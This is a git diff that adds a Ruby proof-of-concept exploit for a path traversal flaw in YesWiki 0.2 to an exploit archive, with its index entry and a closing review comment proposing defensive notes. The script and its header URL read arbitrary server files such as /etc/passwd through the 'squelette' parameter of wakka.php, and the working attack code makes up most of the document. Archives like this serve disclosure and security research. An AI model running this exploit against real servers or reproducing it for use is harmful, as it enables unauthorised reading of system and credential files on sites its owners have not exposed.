diff --git a/files.csv b/files.csv
index 828ac9950..279e37607 100755
--- a/files.csv
+++ b/files.csv
@@ -34380,6 +34380,7 @@ id,file,description,date,author,platform,type,port
 38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
 38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
 38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
+38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal Vulnerability",2015-09-02,HaHwul,php,webapps,80
 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
diff --git a/platforms/php/webapps/38071.rb b/platforms/php/webapps/38071.rb
new file mode 100755
index 000000000..a85d89b4b
--- /dev/null
+++ b/platforms/php/webapps/38071.rb
@@ -0,0 +1,44 @@
+# Exploit Title: YESWIKI 0.2 - Path Traversal
+# Date: 2015-09-02
+# Exploit Author: HaHwul
+# Exploit Author Blog: http://www.codeblack.net
+# Vendor Homepage: http://yeswiki.net
+# Software Link: https://github.com/YesWiki/yeswiki
+# Version: yeswiki 0.2
+# Tested on: Debian [Wheezy]
+# CVE : none
+# ===========================================
+
+#Vulnerability
+#Open Browser: http://[targetURL]//vul_test/yeswiki/wakka.php?wiki=PagesACreer/edit&theme=yeswiki&squelette=/../../../../../../../../../../../../etc/passwd&style=gray.css&bgimg=&newpage=1
+
+require "net/http"
+require "uri"
+
+if ARGV.length != 2
+
+puts "YESWIKI Path Traversal Exploit - File Downloader"
+puts "Usage: ruby yeswiki_traversal.rb [targetURL wakka.php] [File name]"
+puts " Example : ~~.rb http://127.0.0.1/vul_test/yeswiki/wakka.php /etc/passwd"
+puts " exploit & code by hahwul[www.codeblack.net]"
+
+else
+puts "YESWIKI Path Traversal Exploit - File Downloader"
+puts "#set Payload..."
+target=ARGV[0]
+downfile=ARGV[1]
+puts " + target : #{target}"
+puts " + DownFile : #{downfile}"
+puts "#Exploit"
+uri = URI.parse("#{target}/vul_test/yeswiki/wakka.php")
+uri.query = URI.encode_www_form({"wiki"=>"PagesACreer/edit","newpage"=>"1","style"=>"gray.css","bgimg"=>"","squelette"=>"/../../../../../../../../../../../../#{downfile}","theme"=>"yeswiki"})
+http = Net::HTTP.new(uri.host, uri.port)
+request = Net::HTTP::Get.new(uri.request_uri)
+response = http.request(request)
+puts "#Response code: "+response.code
+endNm = response.body.index("<")
+result = response.body[0..endNm-1]
+puts "#Result: "+result
+puts "#End.."
+end
+
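Review bot: The header comment block shows the request that triggers the traversal but gives a defender nothing to act on: it never names the `squelette` query parameter of `wakka.php` as the affected input, and `# CVE : none` leaves no identifier for tracking a fix. Under `#Vulnerability` I would add `# Affected input: 'squelette' (template name) comes from the query string and appears to be used as a file path without normalisation.` and `# Detection/mitigation: look for 'squelette=' values containing '../' in access logs; the template name should be limited to a basename inside the theme directory.` The root-cause wording is inferred from the request shown here, since the YesWiki source is not part of this diff, so it should stay hedged until confirmed against the vendor code.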